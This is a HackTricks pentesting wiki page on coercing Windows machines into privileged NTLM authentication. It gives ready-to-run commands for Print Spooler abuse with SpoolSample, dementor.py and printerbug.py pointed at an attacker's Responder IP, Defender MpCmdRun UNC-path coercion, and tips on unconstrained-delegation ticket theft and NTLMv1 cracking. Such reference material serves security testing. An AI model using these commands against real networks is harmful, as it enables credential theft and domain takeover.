HackTricks
Search…
👽
Network Services Pentesting
Force NTLM Privileged Authentication
Support HackTricks and get benefits!

Spooler Service Abuse

If the Print Spooler service is enabled, you can use some already known AD credentials to request to the Domain Controller’s print server an update on new print jobs and just tell it to send the notification to some system. Note when printer send the notification to an arbitrary systems, it needs to authenticate against that system. Therefore, an attacker can make the Print Spooler service authenticate against an arbitrary system, and the service will use the computer account in this authentication.

Finding Windows Servers on the domain

Using PowerShell, get a list of Windows boxes. Servers are usually priority, so lets focus there:
1
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
Copied!

Finding Spooler services listening

Using a slightly modified @mysmartlogin's (Vincent Le Toux's) SpoolerScanner, see if the Spooler Service is listening:
1
. .\Get-SpoolStatus.ps1
2
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}
Copied!
You can also use rpcdump.py on Linux and look for the MS-RPRN Protocol
1
rpcdump.py DOMAIN/USER:[email protected] | grep MS-RPRN
Copied!

Ask the service to authenticate against an arbitrary host

You can compile SpoolSample from here.
1
SpoolSample.exe <TARGET> <RESPONDERIP>
Copied!
or use 3xocyte's dementor.py or printerbug.py if you're on Linux
1
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
2
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
Copied!

Combining with Unconstrained Delegation

If an attacker has already compromised a computer with Unconstrained Delegation, the attacker could make the printer authenticate against this computer. Due to the unconstrained delegation, the TGT of the computer account of the printer will be saved in the memory of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to retrieve this ticket and abuse it (Pass the Ticket).

Inside Windows

If you are already inside the Windows machine you can force Windows to connect to a server using privileged accounts with:

Defender MpCmdRun

1
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
Copied!

Cracking NTLMv1

If you can capture NTLMv1 challenges read here how to crack them. Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"
Support HackTricks and get benefits!